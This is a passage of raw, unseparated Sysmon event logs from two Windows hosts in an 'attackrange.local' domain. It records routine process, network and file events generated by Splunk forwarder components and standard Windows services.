Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104440Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:00.179{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A196E5E43F466B024598E1B603B6A99,SHA256=41983E05C9260628444B3A85A6564C9B0FA74FDFC6C27052000895B4E5F81F8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104439Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.280{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49602-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000104438Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:58.280{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49602-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 23542300x800000000000000082357Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:01.666{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93B3BE70C54E7B8CB1B7F0A21F837468,SHA256=1009B3B0673D274DC1F4028EFC40020C8E322A2007267B5F2AD105B1C072D437,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104451Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:01.194{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC63CCD713B7EC90DE55FBF90BCB86B3,SHA256=6ED361AD448A24F7A07975A8BA2F3D8766A11E96134CBAB38C7E4C5C33B7A643,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082356Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:59.703{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50091-false10.0.1.12-8000- 354300x8000000000000000104450Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:59.311{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49603-false10.0.1.12-8000- 23542300x800000000000000082358Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:02.885{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B0F53C7D374252E69F21D0765C809AB,SHA256=0CFF685B5EBA7AE21BDF3F15C975AF9599957DC950BCC579219BC30A38193708,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104461Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.413{58E9C193-B392-615A-F301-00000000FC01}69285796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104460Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.226{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12BAFFD1289C17BE46A4F4FB2ED31F66,SHA256=47C3FFF60EA8E0DAAD6F3506C327738988C93830E485719CDD5FBE4DE9F6C13A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104459Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.210{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B392-615A-F301-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104458Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.210{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104457Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.210{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104456Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.210{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104455Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.210{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104454Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.210{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B392-615A-F301-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104453Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.210{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B392-615A-F301-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104452Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:02.211{58E9C193-B392-615A-F301-00000000FC01}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082359Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:03.886{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=239B6A14C836181CE513F2F93F36ABA4,SHA256=B3DFF84195329ACE93D1CE3F15905C84D6F65F331E49FE4E353AD0BA88192879,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104480Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.866{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B393-615A-F501-00000000FC01}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104479Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.866{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104478Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.866{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104477Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.866{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104476Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.866{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104475Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.866{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B393-615A-F501-00000000FC01}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104474Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.866{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B393-615A-F501-00000000FC01}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104473Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.867{58E9C193-B393-615A-F501-00000000FC01}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104472Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.460{58E9C193-B393-615A-F401-00000000FC01}68647120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104471Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.272{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4FE35794B3286BEE63D2C5D2A78A2D5,SHA256=93CFF67A3B994C4A86379D62EF587573192853F1AF915158EB0C2277B68BD323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104470Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.272{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFDA240909AD6E743768C119C619D074,SHA256=E687CA4920A5E2AFCA9817F922067B0CC2945034737CBCA3DB1197D67C3C112A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104469Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.194{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B393-615A-F401-00000000FC01}6864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104468Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.194{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104467Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.194{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104466Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 